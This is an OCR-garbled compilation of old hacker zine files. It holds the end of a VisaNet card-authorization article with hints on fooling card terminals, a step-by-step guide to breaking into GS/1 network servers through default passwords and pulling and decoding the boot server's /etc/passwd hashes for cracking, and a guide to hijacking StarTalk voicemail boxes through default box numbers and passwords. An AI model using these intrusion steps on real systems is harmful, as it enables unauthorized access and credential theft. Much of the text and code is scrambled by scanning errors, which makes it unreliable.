Ex nd-of-text, the frame ending character the last message of a sequence 

eot: end-of-transmission, used to end an exchange and signal disconnect 

eng: enquiry, an invitation to transmit a message or retransmit last item 

ack: affirmative acknowledgment, follows correct reception of message 

nak: negative acknowledgment, used to indicate that the message was not 
understood or was received with errors 

syn: delay character, wait thirty seconds 

etb: end-of-block, the end framing character used to signal the end of a message 


within a multiple message sequenc 


other quick notes: visanet sometimes sends ack before stx on responses 
lrc characters can hold any value, such as stx, nak, etc 
visanet can say goodbye at any time by sending eot 
people can get very anal about error flow diagrams 


[ section four ] 
[ half the story; central data capture ] 


a full transaction requires two steps, one of which is described in this 
document: getting the initial authorization. an authorization does basically 
nothing to a person’s account. oh, you could shut somebody’s account down for 
a day or two by requesting a twenty thousand dollar authorization, but no other 
ill effects would result. central data capture, the second and final step ina 
transaction, needs information from both the authorization request and 

response, which is used to generate additional data records. these records are 
then sent to visanet by the merchant in a group, usually at the end of each day. 


[ section five ] 
common applications ] 


access to visanet can be implemented in a number of ways: directly on a pos 
terminal, indirectly via a lan, in a hardware specific device, or any 
permutation possible to perform the necessary procedures. card swipers commonly 
seen at malls are low tech, leased at around fifty dollars per month, per 
terminal. they have limited capacity, but are useful in that all of the 
information necessary for transactions is self contained. dr delam and maldoror 
found this out, and were delighted to play the role of visanet in fooling the 
little device. close scrutiny of section one reveals atm formats, phone order 
procedures, and new services such as direct debit from checking/savings and 
checks by phone. start noticing the stickers for telecheck and visa atm cards, 
and you’re starting to get the picture. 


[ section seven ] 
[ brave new world ] 


could it be? yes, expiration dates really don’t matter.... 
this article written to thank previous Phrack writers... 
please thank me appropriately... 

800#S exist... 


other services exist... mastercard runs one... 
never underestimate the power of asking nicely... 
numerous other formats are available... see section one, 3.0 for hints... 


never whistle while you’re pissing...\032 
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<> <> 
<> —---+4+4+===::: GETTIN’ DOWN ’N DIRTy wiT Da GS/1  :::===+++---- <> 
<> <> 
es SR RG Gk Se et OG PO Lee ek tn een PER, ey Ue eA BE eta PIE ge ey, Gey <> 
<> <> 
<> Brought to you by: <> 
<> [)elamO Labz, Inc. and ChURcH oF ThE Non-CoNForMisT <> 
<> <> 
<> Story line: Maldoror -n- [)r. [)elam <> 
<> Main Characters: Menacing Maldoror & The Evil [)r. [)elam <> 
<< Unix Technical Expertise: Wunder-Boy [)elam <> 
<> Sysco Technishun: Marvelous Maldoror <> 
<> <> 
<> Look for other fine [)elamo Labz and ChURcH oF ThE <> 
<> Non-CoNForMisT products already on the market such as <> 
<> DEPL (Delam’s Elite Password Leecher), NUIA (Maldoror’s <> 
<> Tymnet NUI Attacker), TNET.SLT (Delam’s cheapO Telenet <> 
<> skanner for Telix), PREFIX (Maldoror’s telephone prefix <> 
<> identification program), and various other programs and <> 
<> philez written by Dr. Delam, Maldoror, Green Paradox, <> 
<> El Penga, Hellpop, and other certified DLI and CNC members. <> 
<> <> 
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Connecting to the boot server 

Getting the boot server password file 
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YAO BWNE 


Here’s hacking a GS/1 made EZ (for the sophisticated hacker) It is 
advisable to fill your stein with Sysco and pay close attention... if 
Sysco is not available in your area, Hacker Pschorr beer will work 
almost as good... (especially Oktoberfest variety) 


What is a GS/1? 


A GS/1 allows a user to connect to various other computers... in other 
words, it’s a server, like a DEC or Xyplex. 


So why hack it? 


Cuz itz there... and plus you kan access all sortz of net stuph fer 
phree. (QSD @ 208057040540 is lame and if you connect to it, you’re 
wasting the GS/1.. the French fone police will fly over to your country 
and hunt you down like a wild pack of dogs, then hang you by your own 
twisted pair.) 


What to do: 


Wed Apr 26 09:43:40 2017 


#1. 


Finding and identifying a GS/1 


Find a GS/1 
GS/1, 


they’ 


though the prompt can be set to whatever you 


re EZ to identify... they usually have a prompt of 


want it to be. A 


few years ago ther 


Tymnet and Telenet... 


DNIC’s. (If you don 


some old Phracks and LOD tech. 


were quite a number of GS/1’s laying around on 
you can still find a few if you scan the right 
't know what the hell I’m talking about, look at 


journals.) 


similar to this: 


The prompt will look 
('2) GS/1> 
(The (!2) refers to 


First try typing a ’? 


A help listing looks 


the port you are on) 


#2. 


Getting help 


?’ to display help items. 


like this: 


(!2) GS/1>? 
Connect 
DO 

Echo 
Listen 
Pause 
PIng 
SET 
SHow 


VVVVVVV VV 


At higher privileges 


<address>[,<address>] 
<macro-name> 


[ 


<string> 

[<seconds>] 

<address> [ timeout ] 
<param-name> = <value> 
<argument> 


such as global (mentioned next) the help will 


look like this (note the difference in the GS/1 prompt with a # sign): 
> (!2) GS/1# ? 

> BRoadcast ( <address> ) <string> 

> Connect ( <address> ) <address>[,<address>] [ ECM ] [ Q ] 
> DEFine <macro-name> = ( <text> ) 

> DisConnect ( <address> ) [<session number>] 

> DO ( <address> ) <macro-name> 

> Echo <string> 

> Listen ( <address> ) 

> Pause [<seconds>] 

> PIng <address> [ timeout ] 

> ReaD ( <address> ) <option> <parameter> 

> REMOTE <address> 

> ROtary ( <address> ) !<rotary> [+|-]= !<portid>[-!<portid>] 
> SAve ( <address> ) <option> <filename> 

> SET ( <address> ) <param-name> = <value> 

> SETDefault ( <address> ) [<param-name> = <value>] 

> SHow ( <address> ) <argument> 

> UNDefine ( <address> ) <macro-name> 

> UNSave ( <address> ) <filename> 

> ZeroMacros ( <address> ) 

> ZeroStats ( <address> ) 

Additional commands under global privilege are: BRoadcast, DEFine, 
DisConnect, ReaD, REMOTE, ROtary, UNDefine, UNSave, ZeroMacros, 
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ZeroStats, and a few extra options under the normal user commands. 


If you need in-depth help for any of the commands, you can again use the 
'2?’ in the following fashion: 


> (!2) GS/1>sho ? 

> SHow ADDRess 

> SHow ClearingHouseNames [ <name> [ @ <domain> [@ <organ.> ] ] ] 
> SHow DefaultParameters [<param-name> ...] 
> SHow GLobalPARameters 

> SHow NetMAP [ Short | Long ] 

> SHow PARAmeterS [<param-name> ...] 

> SHow <param-name> 

> SHow SESsions [ P ] 

> SHow VERSion 

> (!2) GS/1>sh add? 

> SHow ADDRess 


> (!2) GS/1>sh add 
> ADDRess = &000023B5%07000201E1D7!2 


"sh add" displays your own network, address and port number. 


The network is 000023B5 
The address is 07000201E1D7 
The port number is 2 


+ #3. Gaining top privilege access 


Figure out the global password. 


Do a "set priv=global" command. 
Note: 
There are 3 states to set priv to: user, local, and global. Global is 
the state with the most privilege. When you attain global privilege, 
your prompt will change to have a ’#’ sign at the end of it.. this means 


you have top priceless (similar to *nix’s super user prompt). 


The GS/1 will prompt you for a password. The default password on GS/1’s 
is to have no password at all... The GS/1 will still prompt you for a 
password, but you can enter anything at this point if the password was 
never set. 


+ #4. Finding the boot server + 


Figure out the boot server address available from this GS/1 


The boot server is what lies under the GS/1. We’ve found that GS/1’s are 


actually run on a Xenix operating system... (which is of course a nice 
phamiliar territory) It’s debatable whether all GS/1’s are run on Xenix or 
not as we have yet to contact the company. (We may put out a 2nd file going 


into more detail.) 
Do a "Sh b" or "Sh global" as shown in the following examples: 


> (!2) GS/1# sh b 
> BAud = 9600 BootServerAddress = &00000000%070002017781 


17.txt Wed Apr 26 09:43:40 2017 4 


> BReakAction = ( FlushVC, InBand ) BReakChar = Disabled 

> BSDelay = None BUffersize = 82 

> (!2) GS/1# sh global 

De assests: Boo Brom siiars 5, ph Be dates garde sPiavionauen anise Globe: “PALAMSTSLS wee teedis eh been we gies OSES Ob ens. Shas eL 
> DATE = Wed Jun 22 21:16:45 1994 TimeZone = 480 minutes 

> DaylightSavingsTime = 0 minutes LogoffStr = "L8r laM3r" 

> WelcomeString = "Welcome to your haqued server (!2), Connected to " 
> DOmain = "thelabz" Organization = "delamO" 

> PROmpt = "GS/1>" NMPrompt = "GS/1# " 

> LocalPassWord = "" GlobalPassWord = "haque-me" 
> NetMapBroadcast = ON MacType = EtherNET 

> CONNectAudit = ON ERRorAudit = ON 

> AUditServerAddress = &000031A4%07000200A3D4 

> AUditTrailType = Local 

> BootServerAddress = &00000000%070002017781 


Side note: the GlobalPassWord is "haque-me" whereas the LocalPassWord is "" 
these are the actual passwords that need to be entered (or in the case 

of the LocalPassWord, "" matches any string). You’ll only be able to 

"sh global" after a successful "set priv=global". 


Now that you have the boot server address, the next step is enabling 
communication to the boot server. 


+ #5. Connecting to the boot server + 


Do a REMOTE <address> where address is the address of the machine you 
want to issue remote commands to. 


> (!2) GS/1# REMOTE %070002017781 

> (!2) Remote: ? 

> Bind <address> [-f <bootfile>] [-1l <loader>] [<nports>] 
> BRoadcast ( <address> ) "<string>" 

> CoPyfile [<address>:]<pathname> [<address>:] [<pathname>] 

> List [ -ls1CR ] [<pathname> ...] 

> MoVe <pathname> <pathname> 

> NAme <clearinghouse name> = <address>[,<address>]... 

> Ping <address> [timeout] 

> ReMove <pathname> 

> SE [( <address> )] <param-name> = <value> 

> SETDefault <param-name> = <value> 

> SHow <argument> 

> UNBind <address> 

> UNDefine <macro name> 

> UNName <name> 

> ZeroStats 

> <BREAK> (to leave remote mode) 

Your prompt changes from "(!2) GS/1# " to "(!2) Remote: "... this means 


you will be issuing commands to whatever remote machine you specified 
by the REMOTE <address> command. 


Notice for this case, the boot server’s address was used. 


When you get the REMOTE: prompt, you can issue commands that will be 
executed on the remote machine. Try doing a ’?’ to see if it’s another 
GS/1.. if not, try doing ’ls’ to see if you have a *nix type machine. 


Also notice that the help commands on the remote are not the same as 
those for the GS/1 (though, if you establish a remote link with another 
GS/1 they will be the same). 


> (!2) Remote: 1s -l 
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> total 1174 

> drwxrwxrwx 2 ncs ncs 160 Aug 17 1989 AC 

> drwxrwxrwx 2 ncs ncs 5920 Jun 5 00:00 AUDIT_TRAIL 
> drwxrwxrwx 2 ncs ncs 96 Jun 5 01:00 BACKUP 

> drwxrwxrwx 2 ncs ncs 240 Jun 4 04:42 BIN 

> drwxrwxrwx 2 ncs ncs 192 Jun 4 04:13 CONFIGS 

> drwxrwxrwx 2 ncs ncs 64 Aug 17 1989 DUMP 

> drwxrwxrwx 2 ncs ncs 80 Aug 17 1989 ETC 

> drwxrwxrwx 2 neces ncs 160 Jun 4 04:13 GLOBALS 

> -rw-r--r-- 1 neces ncs 228 Jun 5 00:59 btdata 

> -rw-r--r-- 1 neces ncs 8192 Jun 8 1993 chnames.dir 
> -rw-r--r-- 1 nes ncs 11264 Jun 1 13:41 chnames.pag 
> drwxrwxrwx 2 ncs ncs 48 Jun 5 00:00 dev 

> drwx------ 2 bin bin 1024 Aug 17 1989 lost+found 
> -rw-rw-rw- 1 neces ncs 557056 Mar 23 1992 macros 

> -rw-r--r-- 1 nes ncs 512 Oct 22 1993 passwd 


Look familiar?? If not, go to the nearest convenient store and buy the 
a 12 pack of the cheapest beer you can find... leave your computer 
connected so you hurry back, and slam eight or nine cold onez... then 
look at the screen again. 


You’ re basically doing a Remote Procedure Call for ls to your Xenix boot 
server. 


Notice at this point that the "passwd" is not owned by root. This is 
because this is not the system password file, and you are not in the 
"/etc" directory... (yet) 


There are a couple of problems: 


(!2) Remote: cat 
Invalid REMOTE command 


(!'2) Remote: cd /etc 
Invalid REMOTE command 


VVVV NV 


You cannot view files and you cannot change directories. 


To solve the "cd" problem do the following: 


> (!2) Remote: 1s -l 

> total 26 

> drwxrwxrwx 12 root root 352 Jun 5 00:59 NCS 

> drwxr-xr-x 2 bin bin 112 Aug 17 1989 adm 

> drwxrwx--- 2 sysinfo sysinfo 48 Aug 17 1989 backup 

> drwxr-xr-x 2. bin bin 1552 Aug 17 1989 bin 

> drwxr-xr-x 20 bin bin 720 Aug 17 1989 lib 

> drwxrwxrwx 6 ncs ncs 224 Aug 17 1989 ncs 

> drwxr-xr-x 2 bin bin 32 Aug 17 1989 preserve 
> drwxr-xr-x 2 bin bin 64 Aug 17 1989 pub 

> drwxr-xr-x 7 bin bin 144 Aug 17 1989 spool 

> drwxr-xr-x 9 bin bin 144 Aug 17 1989 sys 

> drwxr-x--- 2 root root 48 Aug 17 1989 sysadm 

> drwxrwxrwx 2 bin bin 48 Jun 5 01:00 tmp 

> 

> (!'2) Remote: Ils -l ../.. 

> total 1402 

> -rw-r--r-- 1 root root 1605 Aug 17 1989 .login 

>. h-=-r--e- 1 nes ncs 1605 Aug 28 1990 .login.ncs 
> -rw-r--r-- 1 root root 653 Aug 17 1989 .logout 
> Sr- rer +-r-- 1 nes ncs 653 Aug 28 1990 .logout.ncs 
> -rw------~- 1 root root 427 Aug 17 1989 .profile 
> drwxr-xr-x 2 bin bin 2048 Aug 17 1989 bin 
>oeboSHscS a 1 bin bin 25526 May 4 1989 boot 

> drwxr-xr-x 6 bin bin 3776 Aug 17 1989 dev 

> -r-------- 1 bin bin 577 Nov 3 1987 dos 

> drwxr-xr-x 5 bin bin 1904 Jun 2 12:40 etc 
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> drwxr-xr-x 2 bin bin 
> drwx------ 2 bin bin 
> drwxr-xr-x 2 bin bin 
> drwxrwxrwx 2 bin bin 
> drwxr-xr-x 14 bin bin 
> -rw-r--r-- 1 bin bin 
> -rw-r--L4r-—- 1 root root 


2017 


64 
1024 
32 

512 
224 
373107 
287702 


Your brain should now experience deja vous.. 
root directory. (for the non-*nix, 
has key *nix directories such as /etc, 


Now you can get to /etc/passwd as 


> (!2) Remote: ls -l ../../etc 
> total 1954 

> -rwx--x--x 1 bin bin 
> -rwx-----~— 1 ban bin 
> -rwx------ 1 bin bin 
> -rw-rw-rw- 1 root root 
> -rwx--x--x 1 bin bin 
> =-rw-r--r-- 1 bin bin 
> -rw-r--r-- 2 bin bin 
> -rw-r--r-- 1 nes ncs 
> -rw-r--r-- 2 bin bin 
> -rwx-----~— 1 bin bin 
Sob WwxX-so a= 1 bin bin 
> -rwx------ 1 bin bin 
> -rwxr-xXr-x 1 root bin 
> -rw-r--r-- 1 bin bin 
De eset BS etc. 

> SLw=L-=L== 1 root root 


Yeah, now what?! 


You've found the /etc/passwd file, 


follows: 


7110 
1943 
31756 
1200 
24726 
Leh 

17 

17 

17 
2857 
7550 
8034 
31090 
369 


465 


/bin, 


6 


Aug 
Aug 
Aug 
Jun 
Aug 
Aug 
Aug 


May 
May 
May 
Apr 
May 
Aug 
Aug 
Aug 
Aug 
May 
May 
May 
Aug 
May 


Mar 


aIyYAY oA YI ~ 


but you don’t have 


1989 
1989 
1989 
01:20 
1989 
1989 
1989 


lib 


mnt 
tmp 
usr 
xenix 


xenix.old 


you just found the 
lamO-hacker, 


lost+found 


the root directory 
in. at.) 


/dev, /lib, 


etc. 


accton 
asktime 
badtrk 
bootlog 


brand 


checklist 
checklist 
checklist 
checklist 


chsh 
rou Bacal 
cmos 
cron 
cshre 


passwd 


-last 
.ncs 
.orig 


"cat" to type the 


file out. Now you’re stuck... so drink a half a bottle of Sysco per 


person. (We did... and as you’ll see, 
like us... make sure it’s the big bottle kind not those girly small 


onez.) 


+ #6. Getting the boot server password file 


There is one way to get around the cat problem 
catnip laced with somethin U made frum a phile on yer doorstep) 
It’s done using ls. On this Xenix system, 
the old Unix format: A 16 byte record comprised of a 2 byte I-number 


and a 14 byte character field. 


(no itz nOt puttin 


Sysco is the drink of a manly hackers 


the directory structure is 


Note about directory structure for the inquisitive hacker: 
In a directory record there is a 14 byte string containing the file 
an integer in this case) 
Th 
I-node then contains the information about where the file’s data is 
actually kept (similar to how a FAT table works on an IBM PC yet a 


name, and the 2 byte I-number 


which is a number that is an (1I)ndex pointer to th 


different concept as it has indirect index blocks etc. 
into) and what permissions are set for th 


newer *nix implementations, fil 


(2 bytes 


and the directory structure wil 


I-nod 


fil 


B 


The "ls" command has an option that allows you to tell i 


a *directory*.. so show me what’s in the directory"... 
systems won’t like this (the -f option) 


structure. 


I won’t get 


warned that in 
le names can be more than 14 characters 
ll be a bit different than discussed. 


"this: *fie* -1s 


newer *nix 
because of the new directory 
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> (!2) Remote: ls -? 

> ls: illegal option --? 

> usage: -—l1ACFRabcdfgilmnopgqrstux [files] 

> 

> (!2) Remote: 1s -1ACFRabcdfgilmnopqrstux ../../etc/passwd 

> 28530 ot:BJ1x/e8APHe 30580 :0:0:Super use 14962 /:/bin/csh?sys 
> 25697 m:X/haSgqFDwHz1 14929 0:0:System Adm 28265 istration:/usr 
> 29487 ysadm:/bin/sh? 29283 on:NOLOGIN:1:1 17210 ron daemon for 
> 28704 eriodic tasks: 14895 ?bin:NOLOGIN:3 13114 :System file a 
> 28004 inistration:/: 29962 ucp::4:4:Uucp 25697 ministration:/ 
> 29557 r/spool/uucppu 27746 ic:/usr/lib/uu 28771 /uucico?asg:NO 
> 20300 GIN:6:6:Assign 25185 le device admi 26990 stration:/:?sy 
> 26995 nfo:NOLOGIN:10 12602 O:Access to sy 29811 em information 
> 12090 :?network:NOLO 18759 N:12:12:Mail a 25710 Network admin 
> 29545 tration:/usr/s 28528 ol/micnet:?1lp: 20302 LOGIN:14:3:Pri 
> 29806 spooler admin 29545 tration:/usr/s 28528 ol/1p:?dos:NOL 
> 18255 IN:16:10:Acces 8307 to Dos devices 12090 :?ncs:yYNFnHnL 
> 22327 xcU:100:100:NC 8275 operator:/usr/ 

> 

> (!2) Remote: <BRK> 

> (!2) GS/1# 

Wow, kewl. Now that you have a bunch-o-shit on your screen, you have 


to make some sense out of it. 


The password file is almost legible, but the I-numbers still need to be 
converted to ASCII characters. This can be accomplished in a variety of 
ways... the easiest is to write a program like the following in C: 


On a PC the following code should work: 


#include <stdio.h> 
main() 
{ 
union { 
ENG “1s 
char c[2]; 
} x; 
while (1) { 
printf("Enter I-Number: 
scanf("%Sd", &x.1i); 
printf("d = [$c] [$c] \n\n", x.i, 


ie 


x.c[0O], x.c[1]); 


} 
(depending on 


On a *nix based system the following code will work 
word size and byte arrangement) : 


#include <stdio.h> 
main () 
{ 
union { 
short int i; 
char c[2]; 
} xX; 
while (1) { 
printf("Enter I-Number: 
scanf("Shd", &x.1); 
printf("Sd = [%c] [%c]\n\n", x.i, x.c[1], x.c[0]); 


ie 


When you have translated the I-numbers you can substitute the ASCII 
values by hand (or write a d0p3 program to do it for you): 


28530 ot:BJ1x/e8APHe 30580 :0:0:Super use 14962 /:/bin/csh?sys 
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28530 = [r] [o] 30580 = [t] [w] 14962 
root:BJ1x/e8APHetw:0:0:Super user:/:/bin/csh?sys 


25697 m:X/haSqFDwHz1 14929 0:0:System Adm 28265 
25697 = [a] [d] 14929 = [Q][:] 28265 
adm:X/haSqFDwHz1Q:0:0:System Administration:/usr 


29487 ysadm:/bin/sh? 29283 on:NOLOGIN:1:1 17210 
29487 = [/]{[s] 29283 = [c][r] 17210 
/sysadm:/bin/sh?cron:NOLOGIN:1:1:Cron daemon for 


28704 eriodic tasks: 14895 ?bin:NOLOGIN:3 13114 
28704 = [ Jip] 14895 = [/][:] 13114 
periodic tasks:/:?bin:NOLOGIN:3:3:System file a 


28004 inistration:/: 29962 ucp::4:4:Uucp 25697 
28004 = [d] [m] 29962 = [*M] [u] 25697 
dministration:/: 

uucp::4:4:Uucp administration: / 

29557 r/spool/uucppu 27746 ic:/usr/lib/uu 28771 
29557 = [ul[s] 27746 = [b] [1] 28771 


usr/spool/uucppublic:/usr/lib/uucp/uucico?asg:NO 


20300 GIN:6:6:Assign 25185 le device admi 26990 
20300 = [L] [0] 25185 = [a] [b] 26990 
LOGIN: 6:6:Assignable device administration:/:?sy 


26995 nfo:NOLOGIN:10 12602 O:Access to sy 29811 
26995 = [s] [i] 12602 = [:][1] 29811 
sinfo:NOLOGIN:10:10:Access to system information 


12090 :?network:NOLO 18759 N:12:12:Mail a 25710 
12090 = [:][/] 18759 = [G] [TI] 25710 
:/:?network:NOLOGIN:12:12:Mail and Network admin 

29545 tration:/usr/s 28528 ol/micnet:?lp: 20302 
29545 = [i]l[s] 28528 = [p] [o] 20302 


istration: /usr/spool/micnet:?1lp:NOLOGIN:14:3:Pri 


29806 spooler admin 29545 tration:/usr/s 28528 
29806 = [n] [t] 29545 = [ills] 28528 
nt spooler administration:/usr/spool/lp:?dos:NOL 


18255 IN:16:10:Acces 8307 to Dos devices 12090 
18255 = [0] [G] 8307 = [s]l ] 12090 
OGIN:16:10:Access to Dos devices:/:?nces:yYNFnHnL 


22327 xcU:100:100:NC 8275 operator:/usr/ 
22327 = [7] [Ww] 8275 = [S][ ] 
7WxcU:100:100:NCS operator:/usr 


The resulting file will look like the following: 


root:BJ1x/e8APHetw:0:0:Super user:/:/bin/csh?sys 
adm:X/haSqFDwHz10:0:0:System Administration:/usr 
/sysadm:/bin/sh?cron:NOLOGIN:1:1:Cron daemon for 
periodic tasks:/:?bin:NOLOGIN:3:3:System file a 
dministration:/: 

uucp::4:4:Uucp administration: / 
usr/spool/uucppublic:/usr/lib/uucp/uucico?asg:NO 
LOGIN: 6:6:Assignable device administration: /:?sy 
sinfo:NOLOGIN:10:10:Access to system information 
:/:?network:NOLOGIN:12:12:Mail and Network admin 
istration: /usr/spool/micnet:?lp:NOLOGIN:14:3:Pri 
nt spooler administration:/usr/spool/1lp:?dos:NOL 
OGIN:16:10:Access to Dos devices:/:?ncs:yYNFmHnL 


= [rl fs] 


istration:/usr 


= [i] [n] 


ron daemon for 


= [:] [C] 


:System file a 
SoCs] 


ministration: / 
= [a] [d] 


/uucico?asg:NO 
= [c] [p] 


stration:/:?sy 
= [n] [i] 


em information 


= [s] [t] 


= [n] [d] 


= [N] [0] 


ol/l1p:?dos:NOL 
= [p] [o] 


2 ?ncs:yYNFmHnL 
= [:][/] 


17.txt 
7WxcU:100 


Because t 
as the ca 


delete the 


you finis 


root:BJ1x 
sysadm: X/ 
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:100:NCS operator:/usr 


he ls command cannot display "non-printable" characters such 
rriage return, it will replace them with a ’?’ character... 
'2’ characters and divide by line at these locations. When 
h doing that, you’ll have a standard /etc/passwd file: 


/e8APHetw:0:0:Super user:/:/bin/csh 
haSqFDwHz10:0:0:System Administration:/usr/sysadm:/bin/sh 


cron:NOLOGIN:1:1:Cron daemon for periodic tasks:/: 
bin:NOLOGIN:3:3:System file administration:/: 


uucp::4:4 
asg:NOl 
sysinfo:N 
network:N 
1p:NOLOGI 


:Uucp administration: /usr/spool/uucppublic:/usr/lib/uucp/uucico 


LOGIN: 6:6:Assignable device administration:/: 


LOGIN:10:10:Access to system information:/: 
LOGIN:12:12:Mail and Network administration:/usr/spool/micnet: 
N:14:3:Print spooler administration:/usr/spool/Ip: 


dos:NOLOGIN:16:10:Access to Dos devices:/: 


nes: yYNFm 


Once you’ 
you'll of 
cracking 


O 
O 
HnL7WxcU:100:100:NCS operator:/usr 

ve assembled your password file in a standard ASCII form, 


course want to crack it with one of the many available DI! 
programs. 


Gl 


#7: Ot 


her Avenues 


Find out 
available 


what else you can play with by first finding what networks are 
other than your own, and second, find out what machines are on 


your network: 


>(!2) GS/1# sh att 

> Attached Networks 

>&000023B5 

>(!2) GS/1# sh nmap 1 

> NETWORK &000023B5 MAP 

> 

> 1-%070002017781 SW/AT-NCS 3.0.2 2-%070002A049C5 SW/NB-BR-3.1.1.1 

> 3-%0700020269A7 SW/200-A/BSC/SDL22000 4-%07000201C089 SW/200-A/BSC/SDL22020 
> 5-%070002023644 SW/200-A/BSC/SDL22020 6-%0700020138B2 SW/AT-NCS Qee deed 
> 7-%070002010855 SW/100-A/BSC 20060 8-%070002018BA2 SW/20-XNS-X.25 .0.2 
> etc. 

The boot server address, from previous examples, is number 1 

which contains a description "SW/AT-NCS". Examining the rest of the 

list, number 6 has the same description. System 12 may be just another 

address for the boot server or it may be a different Xenix... but it should 

be Xenix whatever it is. 

We have refrained from covering the typical GS/1 information that has been 
published by others; and instead, covered newer concepts in GS/1 hacking. 


This phil 
publicati 


e is not a complete guide to GS/1 hacking; but expect successive 
ons on the topic. 
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(*) A Complete ’N Easy Guide to Hacking and the (*) 
(*) Usage of "StarTalk" Voice Mail Systems (*) 


Written By: The Red Skull 
07/25/94 


Introduction 

There are many types of different voice mail systems out there, that 
run on phone systems they are compatible with. You have probably seen a lot 
of text files about hacking voice mail systems, on your local bulletin 
boards. The popular ones you might have heard about are systems like, Aspen 
(Automatic Speech Exchange Network), TMC (The Message Center), Audix, and 
Meridian Mail. There are VMB hacking programs that are suppose to hack vmbs 
for you. I really don’t believe in those kind of programs. When I say this, 
IT am not talking about programs like Tone Locator or Blue Beep, I am talking 
about programs like ’/The Aspen Hacker’ and any other *VMB* hacking programs. 
I am just saying this, so you don’t mix this guide up with a vmb hacking 
program. 


General Information 

I have decided to write a hacking/user’s guide for the StarTalk Voice 
Mail System because there is no guide for the StarTalk Voice Mail System, 
and almost no one has heard about it. Since this will be the first one for 
it, I will try and explain it as simply as possible. You might have heard 
of Northern Telecom. They are the makers of StarTalk, but they are also the 
makers of a very popular user-friendly Voice Mail System called ’Meridian 
Mail’. Both StarTalk and Meridian Mail run on the Norstar telephone system. 
StarTalk is designed to function as an extension of the Norstar telephone 
system. All the StarTalk software operation is done on a Norstar telephone 
set, so that means it doesn’t run on a computer terminal. There are 3 
different sizes and configurations that the StarTalk Voice Mail System 
comes with - 


o Model 110 - 2 voice channels, with 1 hour and 50 
minutes total storage. 


o Model 165 - 4 voice channels, with 2 hours and 45 
minutes total storage. 


o Model 385 - 4 voice channels, with 6 hours and 25 
minutes total storage. 
The capabilities of StarTalk Model 385 
can be further expanded through an 
enhancement option, available in 4, 6 
or 8 channel versions, which provides 
a total of 9 hours an 45 minutes of 
storage. 


Right now, you might be wondering what the hell i’m talking about, but 
it’s simple. The number of voice channels means how many voice mail users 
could be using their voice mail. So for example, 4 voice channels, means only 
4 voice mail users could be on the voice mail system. The Model 110 can hold 
about 25 boxes, the Model 165 can hold 50 boxes and the Model 385 can hold 120 
boxes and higher. So, it’s better if you find a StarTalk Voice Mail System 
that is running Model 385. The part that says ‘/with 6 hours and 25 minutes 
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total storage’, means how many hours of messages it can store. The Model 385 
is also upgradable. I could go on about the models but that’s all we need to 
know for now. So now that we’ve finished this, we will get into the part 
that you’ve been waiting for. 


Finding a StarTalk Voice Mail System 


You will probably not be able to recognize a StarTalk voice mail system 
if you find one using a war dialer, because when a StarTalk system answers, 
it will only have the company’s personalized automated greeting. There are 
only two ways to get a StarTalk system: you either scan it out yourself or 
get it from someone else. If you get it from someone else, all the boxes 
will probably be gone, used or just not safe. 


Recognizing a StarTalk Voice Mail System 


Ok, now let’s say you have come across a StarTalk system, how do you 
know that it’s a StarTalk? As I said, you will not be able to tell if it’s a 
StarTalk system by just calling it. If the system is a Startalk, when the 
company’s personalized greeting answers, press ’*’ and it should say - 


"Pleas nter the mailbox number, or press the # sign to use the directory" 


Remember, if you press ’*’ and just sit there, it will repeat the messag 
one more ‘time, and then say "Exiting the system." 


If you hit ’**’ it should say - 
"Please enter your mailbox number and your password, then press # sign" 


If you don’t get anything like this, that means it’s not a StarTalk Voice 
Mail System. If you are still not sure that you have a StarTalk System, 
then you can always call 416-777-2020 and listen to the voice and see 

if it matches with what you have found. 


Finding a Virgin Box 
This is a very interesting step and also an easy one. Once you have 
found a StarTalk Voice Mail System, the first thing you’1l want to do is 
get some boxes on it. The interesting part is that you are always guaranteed 
to get one box on a StarTalk System. This is because every StarTalk System 


has a box that is for the voice mail users to leave any problems they are 
experiencing with their vmb. This is the box that almost always has a default 
on it, but if the System Admin is smart he will change it. So far, on all the 


StarTalk systems that I have come across the default for this box hasn’t been 
changed. The box number is '101’ and the defaults for StarTalk Voice Mail 
systems are ’0000’. So the first thing you should do is call up the system 
and press *101 and the default greeting on the box should say (this greeting 
is for box 101 only) - 


"This is the Trouble-Report mailbox, if you are experiencing difficulty 
using the messaging features, please leave your name, mailbox # anda 
detailed description of the problem" *BEEP* 


If it says that, press ’**’ and then when it asks you to enter your mailbox 
number and your password, enter ’1010000’ and press the # sign. If you’ve 
followed everything I’ve said and the System Admin hasn’t changed the 
default on this box, it should go ahead and ask you to enter your new 
personal mailbox password. There is another box number which is sometimes 
at the default which is the System Admin’s box at 102. Although this is a 
System Admin box, the only System Admin option it has available is to leave 
a broadcast message, which leaves a message to all boxes on the system. 
This box will have the regular default greeting which is - 


"This mailbox is not initialized and cannot accept messages, pleas 
try again later" 


Do the same thing you did before, If it says that, press ’**’ and then when 
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it asks you to enter your mailbox number and your password, enter ’1020000’ 
and press the # sign. If everything is fine, it should ask you to enter your 
new personal mailbox password. This is called Initializing your mailbox, and 
I’1ll talk about this later in this file. So, there you go, you’ve got your 
box on a StarTalk System. All StarTalk Voice Mail Systems that I have run 
into so far have had 2-3 digit mailboxes. Now, to hack any other boxes 
through the system, you would have to go and keep on trying 3 digit mailbox 
number starting with 1XX, until you find an empty box with a regular default 
greeting. Let’s say you find another empty box at box number 130, you will do 
the same thing, press ’**’ and when it asks you to enter your mailbox number 
and your password, enter '’1300000’ and press the # sign. One thing I like 
about box number ’101’ is that, a lot of System Admin’s are not aware that it 
even exists, that is because they probably have a lousy TSR (Technical Service 
Rep). (This is the person that is suppose to help them install the Voice 

Mail System.) 


What to do After you’ve Got A StarTalk Voice Mail Box 
The rest of the file will concentrate on all the inside functions and 
options that a StarTalk Voice Mail Box has. We will be covering all 
these topics —- 


Initializing a Mailbox 

Your Mailbox Greeting 

Recording a Greeting 

Choosing a Mailbox Greeting 

Listening To Messages 

Off-premise Message Notification 

Setting Up Off-premise Message Notification 
Disabling Off-premise Message Notification 
Changing Off-premise Message Notification 
Leaving a Mailbox Message 

Message Delivery Options 

Assigning the Target Attendant 

Quick Reference Tips 


CO0O0O0 0000000 0 


Your Mailbox 


Before you can use your mailbox, you must: 


—- open your mailbox 

— change your password 

— record your name 

— record your personal mailbox greeting(s) 


This is called Initializing your mailbox. 


Initializing a Mailbox 


To open and initialize your mailbox: 


Press * * and Mailbox # 

Enter the default password ’0000’ 

To end the password, press # 

The StarTalk voice prompt, asks you to enter your new personal mailbox 
password. 

5. Using touchtones, enter your new mailbox password. Your password can 
be from 4 to 8 digits long, but it cannot start with zero. 

6. To end your password, press # 

7. After you have accepted your password, you are asked to record your name 

